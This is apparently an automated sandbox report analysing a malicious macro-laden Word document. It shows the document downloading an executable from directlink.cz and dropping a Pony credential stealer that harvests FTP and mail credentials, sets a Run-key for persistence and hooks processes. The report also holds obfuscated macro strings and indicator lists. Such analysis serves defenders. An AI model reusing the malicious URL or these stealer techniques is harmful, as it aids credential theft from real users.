IMG_065099102.DOC
This report is generated from a file or URL submitted to this webservice on July 18th 2017 14:15:39 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v6.80 © Hybrid Analysis
Incident Response

Risk Assessment
- Remote Access
  - Contains a remote desktop related string
  - Reads terminal service related keys (often RDP related)
- Stealer/Phishing
  - Scans for artifacts that may help identify the target
  - Touched instant messenger related registry keys
  - Tries to steal FTP credentials
- Persistence
  - Modifies auto-execute functionality by setting/creating a value in the registry
  - Writes data to a remote process
- Fingerprint
  - Reads the active computer name
  - Scans for artifacts that may help identify the target
- Evasive
  - Possibly checks for the presence of an Antivirus engine
- Network Behavior
  - Contacts 1 domain and 1 host
Indicators
Not all malicious and suspicious indicators are displayed.

Malicious Indicators (15)

External Systems

Detected Emerging Threats Alert
- details:
  - Detected alert "ET CURRENT_EVENTS Possible Malicious Macro DL EXE Feb 2016" (SID: 2022550, Rev: 15, Severity: 1) categorized as "A Network Trojan was detected" (Phishing, Exploit Kits)
  - Detected alert "ET CURRENT_EVENTS Possible Malicious Macro EXE DL AlphaNumL" (SID: 2022566, Rev: 5, Severity: 1) categorized as "A Network Trojan was detected" (Phishing, Exploit Kits)
  - Detected alert "ET POLICY PE EXE or DLL Windows file download HTTP" (SID: 2018959, Rev: 3, Severity: 1) categorized as "Potential Corporate Privacy Violation"
- source: Suricata Alerts
- relevance: 10/10

Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines
- details: 8/66 reputation engines marked "http://directlink.cz" as malicious (12% detection rate)
- source: External System
- relevance: 10/10

Sample was identified as malicious by at least one Antivirus engine
- details: 9/57 Antivirus vendors marked sample as malicious (15% detection rate)
- source: External System
- relevance: 8/10

General

Document spawns new processes
- details: Document spawned a new process (macro present)
- source: Indicator Combinations
- relevance: 7/10

GETs files from a webserver
- details:
    GET /download/6c961004be.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: directlink.cz
    Connection: Keep-Alive
- source: Network Traffic
- relevance: 10/10

The analysis extracted a file that was identified as malicious
- details: 31/80 Antivirus vendors marked dropped file "3956644.bat" as malicious (classified as "Trojan.BAT" with 38% detection rate)
- source: Binary File
- relevance: 10/10

Installation/Persistence

Writes data to a remote process
- details:
  - "WINWORD.EXE" wrote 32 bytes to a remote process "%APPDATA%\Microsoft\FXycd.exe" (Handle: 1948)
  - "WINWORD.EXE" wrote 52 bytes to a remote process "%APPDATA%\Microsoft\FXycd.exe" (Handle: 1948)
  - "WINWORD.EXE" wrote 4 bytes to a remote process "%APPDATA%\Microsoft\FXycd.exe" (Handle: 1948)
  - "FXycd.exe" wrote 32 bytes to a remote process "%APPDATA%\Microsoft\FXycd.exe" (Handle: 228)
  - "FXycd.exe" wrote 52 bytes to a remote process "%APPDATA%\Microsoft\FXycd.exe" (Handle: 228)
  - "FXycd.exe" wrote 4 bytes to a remote process "%APPDATA%\Microsoft\FXycd.exe" (Handle: 228)
  - "FXycd.exe" wrote 102400 bytes to a remote process "%APPDATA%\Microsoft\FXycd.exe" (Handle: 228)
- source: API Call
- relevance: 6/10

Pattern Matching

YARA signature match
- details:
  - YARA signature "pony" classified process "FXycd.exe" as "trojan,pony" based on indicators: "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X},YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0,POST %s HTTP/1.0,Accept-Encoding: identity, *;q=0" (Author: Brian Wallace @botnet_hunter)
  - YARA signature "pony" classified file "all.bstring" as "trojan,pony" based on indicators: "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X},YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0,POST %s HTTP/1.0,Accept-Encoding: identity, *;q=0" (Author: Brian Wallace @botnet_hunter)
  - YARA signature "WarpStrings" classified file "ea106c66db968ce7d222d48f0da93b96095b423cb608b20b37dc536382e7bcef.doc.bin" as "warp,apt,beebus" based on indicators: "wyle" (Author: Seth Hardy)
- source: YARA Signature
- relevance: 10/10

Spyware/Information Retrieval

Scans for artifacts that may help identify the target
- details:
  - "FXycd.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS LIVE MAIL")
  - "FXycd.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET ACCOUNT MANAGER\ACCOUNTS")
  - "FXycd.exe" (Path: "HKCU\IDENTITIES\{57AB3677-534E-4173-8F92-6566F6F82F10}\SOFTWARE\MICROSOFT\INTERNET ACCOUNT MANAGER\ACCOUNTS")
  - "FXycd.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\OUTLOOK\OMI ACCOUNT MANAGER\ACCOUNTS")
- source: Registry Access
- relevance: 3/10

Touched instant messenger related registry keys
- details: "FXycd.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS LIVE MAIL")
- source: Registry Access
- relevance: 5/10

Tries to steal FTP credentials
- details:
  - "Software\FlashPeak\BlazeFtp\Settings" (Indicator: "\blazeftp\")
  - "RushSite.xml" (Indicator: "rushsite.xml")
  - "\VanDyke\Config\Sessions" (Indicator: "\vandyke\config\sessions")
- source: File/Memory
- relevance: 6/10

Unusual Characteristics

Document analysis contacts a domain
- details: Often seen on documents with macro droppers, embedded files or exploits
- source: Indicator Combinations
- relevance: 3/10

Hiding 3 Malicious Indicators (available only in the private webservice or standalone version)

Suspicious Indicators (26)

Anti-Reverse Engineering

Looks up many procedures within the same disassembly stream (often used to hide usage)
- details:
  - Found 11 calls to GetProcAddress@KERNEL32.DLL from FXycd.exe (PID: 1904)
  - Found 47 calls to GetProcAddress@KERNEL32.DLL from FXycd.exe (PID: 1904)
- source: Hybrid Analysis Technology
- relevance: 10/10

Environment Awareness

Reads the active computer name
- details:
  - "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
  - "FXycd.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
- source: Registry Access
- relevance: 5/10

Exploit/Shellcode

Found URL in decoded VBA string
- details:
  - Pattern match: "http://schemas.openxmlformats.org/package/2006/relationships"
  - Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
  - Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/picture"
  - Pattern match: "http://schemas.openxmlformats.org/schemaLibrary/2006/main"
  - Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"
  - Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties"
  - Pattern match: "http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties"
  - Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument"
  - Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme"
  - Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable"
  - Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"
  - Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
  - Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings"
  - Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings"
  - Heuristic match: "vnd.ms"
  - Pattern match: "http://schemas.openxmlformats.org/markup-compatibility/2006"
  - Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
- source: File/Memory
- relevance: 10/10

External Systems

Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details:
  - 8/66 reputation engines marked "http://directlink.cz" as malicious (12% detection rate)
  - 1/63 reputation engines marked "http://julybazed.pw" as malicious (1% detection rate)
- source: External System
- relevance: 10/10

General

Contains ability to find and load resources of a specific module
- details:
  - FindResourceA@KERNEL32.DLL from FXycd.exe (PID: 1904)
  - FindResourceA@KERNEL32.DLL from FXycd.exe (PID: 1904)
  - FreeResource@KERNEL32.DLL from FXycd.exe (PID: 1904)
- source: Hybrid Analysis Technology
- relevance: 1/10

Opened the service control manager
- details:
  - "WINWORD.EXE" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
  - "FXycd.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
- source: API Call
- relevance: 10/10

Requested access to a system service
- details:
  - "WINWORD.EXE" called "OpenService" to access the "rasman" service
  - "WINWORD.EXE" called "OpenService" to access the "Sens" service requesting "SERVICE_QUERY_STATUS" (0X4) access rights
  - "WINWORD.EXE" called "OpenService" to access the "RASMAN" service
  - "FXycd.exe" called "OpenService" to access the "ProtectedStorage" service
  - "FXycd.exe" called "OpenService" to access the "ProtectedStorage" service requesting "SERVICE_START" (0X10) access rights
- source: API Call
- relevance: 10/10

Sent a control code to a service
- details: "FXycd.exe" called "ControlService" and sent control code "0X400" to the service "ProtectedStorage"
- source: API Call
- relevance: 10/10

Installation/Persistence

Contains ability to download files from the internet
- details:
  - recv@WSOCK32.DLL from FXycd.exe (PID: 2580)
  - recv@WSOCK32.DLL from FXycd.exe (PID: 2580)
- source: Hybrid Analysis Technology
- relevance: 10/10

Creates new processes
- details:
  - "WINWORD.EXE" is creating a new process (Name: "%APPDATA%\Microsoft\FXycd.exe", Handle: )
  - "FXycd.exe" is creating a new process (Name: "%APPDATA%\Microsoft\FXycd.exe", Handle: )
- source: API Call
- relevance: 8/10

Modifies auto-execute functionality by setting/creating a value in the registry
- details:
  - "FXycd.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN")
  - "FXycd.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN"; Key: "FXYCD.EXE"; Value: "%APPDATA%\ASound.exe")
- source: Registry Access
- relevance: 8/10

Network Related

Found potential IP address in binary/memory
- details: "2.5.29.37"
- source: File/Memory
- relevance: 3/10

Uses a User Agent typical for browsers, although no browser was ever launched
- details: Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
- source: Network Traffic
- relevance: 10/10

Pattern Matching

Contains ability to download files from the internet
- details:
  - recv@WSOCK32.DLL from FXycd.exe (PID: 2580)
  - recv@WSOCK32.DLL from FXycd.exe (PID: 2580)
- source: Hybrid Analysis Technology
- relevance: 10/10

Remote Access Related

Contains a remote desktop related string
- details:
  - "3inv2%U96vWuj*fJS@2U2w0|vncFV<Y2`KO9wm?MFp~ws:l`kB" (Indicator for product: Generic VNC)
  - "J-LS`LWA9zvnc>'FQ%TmWhLTZhTEWHn SpyX#o,J2h'uni"@v*1cw!" (Indicator for product: Generic VNC)
- source: File/Memory
- relevance: 10/10

Reads terminal service related keys (often RDP related)
- details: "FXycd.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\TERMINAL SERVER"; Key: "TSUSERENABLED")
- source: Registry Access
- relevance: 10/10

Spyware/Information Retrieval

Contains ability to enumerate processes/modules/threads
- details: CreateToolhelp32Snapshot@KERNEL32.DLL from FXycd.exe (PID: 2580)
- source: Hybrid Analysis Technology
- relevance: 5/10

Contains ability to retrieve keyboard strokes
- details:
  - GetKeyboardState@USER32.DLL from FXycd.exe (PID: 1904)
  - GetKeyboardState@USER32.DLL from FXycd.exe (PID: 1904)
- source: Hybrid Analysis Technology
- relevance: 8/10

System Security

Contains ability to impersonate another user on the local machine
- details: LogonUserA@ADVAPI32.DLL from FXycd.exe (PID: 2580)
- source: Hybrid Analysis Technology
- relevance: 10/10

Modifies proxy settings
- details:
  - "FXycd.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  - "FXycd.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
- source: Registry Access
- relevance: 10/10

Queries sensitive IE security settings
- details:
  - "WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
  - "FXycd.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
- source: Registry Access
- relevance: 8/10

Unusual Characteristics

Contains embedded VBA macros with interesting strings
- details:
  - Found pattern type "URL" with value: "http://schemas.microsoft.com/office/2006/xmlPackage"
  - Found pattern type "URL" with value: "http://schemas.openxmlformats.org/package/2006/relationships"
  - Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties"
  - Found pattern type "URL" with value: "http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties"
  - Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument"
  - Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme"
  - Found pattern type "URL" with value: "http://schemas.microsoft.com/office/2007/relationships/stylesWithEffects"
  - Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable"
  - Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"
  - Found pattern type "URL" with value: "http://schemas.microsoft.com/office/2006/relationships/vbaProject"
  - Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
  - Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings"
  - Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings"
  - Found pattern type "URL" with value: "http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas"
  - Found pattern type "URL" with value: "http://schemas.openxmlformats.org/markup-compatibility/2006"
  - Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
  - Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/math"
  - Found pattern type "URL" with value: "http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing"
  - Found pattern type "URL" with value: "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing"
  - Found pattern type "URL" with value: "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
  - Found pattern type "URL" with value: "http://schemas.microsoft.com/office/word/2010/wordml"
  - Found pattern type "URL" with value: "http://schemas.microsoft.com/office/word/2010/wordprocessingGroup"
  - Found pattern type "URL" with value: "http://schemas.microsoft.com/office/word/2010/wordprocessingInk"
  - Found pattern type "URL" with value: "http://schemas.microsoft.com/office/word/2006/wordml"
  - Found pattern type "URL" with value: "http://schemas.microsoft.com/office/word/2010/wordprocessingShape"
  - Found pattern type "URL" with value: "http://schemas.openxmlformats.org/drawingml/2006/main"
  - Found pattern type "URL" with value: "http://schemas.openxmlformats.org/drawingml/2006/picture"
  - Found pattern type "URL" with value: "http://schemas.microsoft.com/office/2006/relationships/wordVbaData"
  - Found pattern type "URL" with value: "http://schemas.openxmlformats.org/schemaLibrary/2006/main"
  - Found pattern type "URL" with value: "http://schemas.microsoft.com/office/word"
  - Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties"
  - Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"
  - Found pattern type "URL" with value: "http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
  - Found pattern type "URL" with value: "http://purl.org/dc/elements/1.1/"
  - Found pattern type "URL" with value: "http://purl.org/dc/terms/"
  - Found pattern type "URL" with value: "http://purl.org/dc/dcmitype/"
  - Found pattern type "URL" with value: "http://www.w3.org/2001/XMLSchema-instance"
  - Found pattern type "Executable file name" with value: "microsoft.com"
- source: Static Parser
- relevance: 10/10

Installs hooks/patches the running process
- details:
  - "WINWORD.EXE" wrote bytes "e99e4819f4" to virtual address "0x75373D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
  - "WINWORD.EXE" wrote bytes "a71d5434" to virtual address "0x690310AC" (part of module "MSPTLS.DLL")
  - "WINWORD.EXE" wrote bytes "e249c834" to virtual address "0x6BC6F530" (part of module "WWLIB.DLL")
  - "WINWORD.EXE" wrote bytes "e96033f5f3" to virtual address "0x755F4731" ("SysAllocStringByteLen@OLEAUT32.DLL")
  - "WINWORD.EXE" wrote bytes "e92399f7f3" to virtual address "0x755F5DEE" ("VariantChangeType@OLEAUT32.DLL")
  - "WINWORD.EXE" wrote bytes "6dbbcb34" to virtual address "0x6A7678E4" (part of module "OART.DLL")
  - "WINWORD.EXE" wrote bytes "7739eb7679a8ef76be72ef76d62def761de2ea7605a2ef76c868ee7657d1f576bee3ea76616fef766841ed760050ed7600000000ad3709778b2d0977b641097700000000" to virtual address "0x74A21000" (part of module "WSHIP6.DLL")
  - "WINWORD.EXE" wrote bytes "9cf6940b" to virtual address "0x68D242C4" (part of module "MSPROOF7.DLL")
  - "WINWORD.EXE" wrote bytes "92e6ea7679a8ef76be72ef76d62def761de2ea7605a2ef76bee3ea76616fef766841ed760050ed7600000000ad3709778b2d0977b641097700000000" to virtual address "0x744F1000" (part of module "WSHTCPIP.DLL")
  - "WINWORD.EXE" wrote bytes "44515e34" to virtual address "0x68F29904" (part of module "RICHED20.DLL")
  - "WINWORD.EXE" wrote bytes "e99a54f4f3" to virtual address "0x755F3E59" ("SysFreeString@OLEAUT32.DLL")
  - "WINWORD.EXE" wrote bytes "e9c53234f4" to virtual address "0x757A6143" ("OleLoadFromStream@OLE32.DLL")
  - "WINWORD.EXE" wrote bytes "c4ca367580bb3675aa6e37759fbb367508bb367546ce367561383775de2f3775d0d9367500000000177975754f9175757f6f7575f4f7757511f77575f2837575857e757500000000" to virtual address "0x6E081000" (part of module "MSIMG32.DLL")
  - "WINWORD.EXE" wrote bytes "393d9834" to virtual address "0x2F851B94" (part of module "WINWORD.EXE")
  - "WINWORD.EXE" wrote bytes "473c2034" to virtual address "0x69760BA8" (part of module "MSO.DLL")
  - "WINWORD.EXE" wrote bytes "e93655f5f3" to virtual address "0x755F3EAE" ("VariantClear@OLEAUT32.DLL")
  - "WINWORD.EXE" wrote bytes "b834000000663d33c0baf498140568dcf53466c3" to virtual address "0x0514905C"
  - "WINWORD.EXE" wrote bytes "4053ed765858ee76186aee76653cef760000000000bf36750000000056cc3675000000007cca36750000000037682a756a2cef76d62def760000000020692a750000000029a6367500000000a48d2a7500000000f70e367500000000" to virtual address "0x76FE1000" (part of module "NSI.DLL")
  - "WINWORD.EXE" wrote bytes "2e6acc34" to virtual address "0x6D06CA70" (part of module "GFX.DLL")
  - "FXycd.exe" wrote bytes "4053ed765858ee76186aee76653cef760000000000bf36750000000056cc3675000000007cca36750000000037682a756a2cef76d62def760000000020692a750000000029a6367500000000a48d2a7500000000f70e367500000000" to virtual address "0x76FE1000" (part of module "NSI.DLL")
- source: Hook Detection
- relevance: 10/10

Writes PE header magic to ADO Stream Object
- details: "WINWORD.EXE" called "ADODB.Stream.6.0.Write" and wrote "MZP", which might be a PE fixup attempt
- source: API Call
- relevance: 5/10

Hiding 2 Suspicious Indicators (available only in the private webservice or standalone version)

Informative (32)

Anti-Detection/Stealthyness

Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
- details: "WINWORD.EXE" (Access type: "QUERYVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "DISABLECACHINGOFSSLPAGES"; Value: "00000000040000000400000000000000")
- source: Registry Access
- relevance: 3/10

Anti-Reverse Engineering

Contains ability to register a top-level exception handler (often used as anti-debugging trick)
- details: SetUnhandledExceptionFilter@KERNEL32.DLL from FXycd.exe (PID: 2580)
- source: Hybrid Analysis Technology
- relevance: 1/10

Found strings in conjunction with a procedure lookup that resolve to a known API export symbol
- details:
  - Found reference to API InitCommonControlsEx@COMCTL32.DLL from FXycd.exe (PID: 1904)
  - Found reference to API ImageList_WriteEx@COMCTL32.DLL from FXycd.exe (PID: 1904)
  - Found reference to API InitializeFlatSB@COMCTL32.DLL from FXycd.exe (PID: 1904)
  - Found reference to API FlatSB_GetScrollRange@COMCTL32.DLL from FXycd.exe (PID: 1904)
- source: Hybrid Analysis Technology
- relevance: 10/10

Environment Awareness

Contains ability to query machine time
- details: GetLocalTime@KERNEL32.DLL from FXycd.exe (PID: 1904)
- source: Hybrid Analysis Technology
- relevance: 1/10

Contains ability to query the machine version
- details:
  - GetVersionExA@KERNEL32.DLL from FXycd.exe (PID: 1904)
  - GetVersion@KERNEL32.DLL from FXycd.exe (PID: 1904)
  - GetVersion@KERNEL32.DLL from FXycd.exe (PID: 1904)
  - GetVersionExA@KERNEL32.DLL from FXycd.exe (PID: 2580)
- source: Hybrid Analysis Technology
- relevance: 1/10

Contains ability to query volume size
- details: GetDiskFreeSpaceA@KERNEL32.DLL from FXycd.exe (PID: 1904)
- source: Hybrid Analysis Technology
- relevance: 3/10

Found a dropped file containing the Windows username (possible fingerprint attempt)
- details: Found dropped filename "4z46j5z@directlink[1].txt" containing the spoofed Windows username "4z46j5z"
- source: Binary File
- relevance: 5/10

Makes a code branch decision directly after an API that is environment aware
- details:
  - Found API call GetVersion@KERNEL32.DLL (Target: "FXycd.exe"; Stream UID: "00017995-00001904-27735-3016-00449E3C") which is directly followed by "cmp ax, 0004h" and "setnb byte ptr [0049BAB0h]". Related instructions (excerpt) from FXycd.exe (PID: 1904):
      +26 call 00406958h ;GetVersion
      +31 and eax, 000000FFh
      +36 cmp ax, 0004h
      +40 setnb byte ptr [0049BAB0h]
  - Found API call GetVersion@KERNEL32.DLL (Target: "FXycd.exe"; Stream UID: "00017995-00001904-27735-3075-0044E768") which is directly followed by "cmp ax, 0004h" and "jc 0044E91Eh". Related instructions (excerpt) from FXycd.exe (PID: 1904):
      +156 call 00406958h ;GetVersion
      +161 and eax, 000000FFh
      +166 cmp ax, 0004h
      +170 jc 0044E91Eh
- source: Hybrid Analysis Technology
- relevance: 10/10

Reads the cryptographic machine GUID
- details: "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
- source: Registry Access
- relevance: 10/10

Reads the registry for installed applications
- details:
  - "WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL")
  - "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL")
  - "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ADDRESSBOOK")
  - "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ADOBE FLASH PLAYER NPAPI")
  - "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\AUTOITV3")
  - "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\CONNECTION MANAGER")
  - "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\DIRECTDRAWEX")
  - "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\DXM_RUNTIME")
  - "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\FONTCORE")
  - "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE40")
  - "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE4DATA")
  - "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE5BAKEX")
  - "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA")
  - "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA0")
  - "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA1")
  - "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA10")
  - "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA100")
  - "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA101")
  - "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA102")
  - "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA103")
- source: Registry Access
- relevance: 10/10

External Systems

Detected Emerging Threats Alert
- details: Detected alert "ET INFO EXE - Served Attached HTTP" (SID: 2014520, Rev: 6, Severity: 3) categorized as "Misc activity"
- source: Suricata Alerts
- relevance: 10/10

General
-
Accesses System Certificates Settings
- details
- "FXycd.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\MY"; Key: "")
- source
- Registry Access
- relevance
- 10/10
-
Contacts domains
- details
- "directlink.cz"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
- "107.154.161.190:80"
- source
- Network Traffic
- relevance
- 1/10
-
Contains embedded VBA macros
- details
- details too long to display
- source
- Static Parser
- relevance
- 10/10
-
Contains embedded VBA macros (normalized)
- details
-
Normalized macro string: "xmlns:pkg=http://schemas.microsoft.com/office/2006/xmlPackage><pkg:part"
Normalized macro string: "xmlns=http://schemas.openxmlformats.org/package/2006/relationships><Relationship"
Normalized macro string: "xmlns:wps=http://schemas.microsoft.com/office/word/2010/wordprocessingShape><w:body><w:p"
Normalized macro string: "xmlns:a=http://schemas.openxmlformats.org/drawingml/2006/main><a:graphicData"
Normalized macro string: "uri=http://schemas.openxmlformats.org/drawingml/2006/picture><pic:pic"
Normalized macro string: "xmlns:pic=http://schemas.openxmlformats.org/drawingml/2006/picture><pic:nvPicPr><pic:cNvPr"
Normalized macro string: "httpfaznv"
Normalized macro string: "VlJlT2hPZkhVU2xQeFV6U3RDTmF1QkFtRENFWGpHcU5aUFR0dUR1aW1TZENZWlRmTnNxbHRMZVVS"
Normalized macro string: "httpg"
Normalized macro string: "cPRRm8NRR2/UdQGY6UlTFWLXNzE+Fb78n18Lf/oXf6OX/5LwnGc9WWGoBeZaGQhrYhR7wlHbttpg"
Normalized macro string: "httpenqacd9hemwk9b"
Normalized macro string: "56B2aFG7tUj9VT1aUdWJAWhXnTp0tKvPt8EI8Nt0q9paZcCbNDta9AxH9feF/m6DWamk4X9zbbHD"
Normalized macro string: "http7x/3v34rtttkszvupb4fbdn4/voc9hxaadoe//+psspoo/wlodobzn3qb6rzj"
Normalized macro string: "vPmKsO3Y7dHsTTP7X/3V34RTTtkSzvupB4fbdn4/vOc9HxAADOE//+PSsPOO/WLodobzn3qB6rzJ"
Normalized macro string: "httpktj"
Normalized macro string: "56Rayj2+MYC2doYtRNugw92BLCqAsVHpbGyj7N6k7hSJFz7xbx8Kd+2+UnX+TOjta9PCskeMtPrJ"
Normalized macro string: "httpm"
Normalized macro string: "f9XeKdlpscR4Ctgc0+LHtn5kEaDnWKRZDGxkKBTbAcDnDqIGeKxGnS1+pAVHb9h4WiDfxAKaaimB"
Normalized macro string: "httpyr3aa"
Normalized macro string: "bDW5bvtZUVTkDwMIEIwsh9lEmm1cwxvb6lwHKLF9zFPX+kJqJ36zetZvtDaPTByfhrz53oJazUAf" - source
- File/Memory
- relevance
- 10/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-61147"
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-61147"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Local\c:!users!4z46j5z!appdata!local!microsoft!windows!temporary internet files!content.ie5!"
"\Sessions\1\BaseNamedObjects\Local\c:!users!4z46j5z!appdata!roaming!microsoft!windows!cookies!"
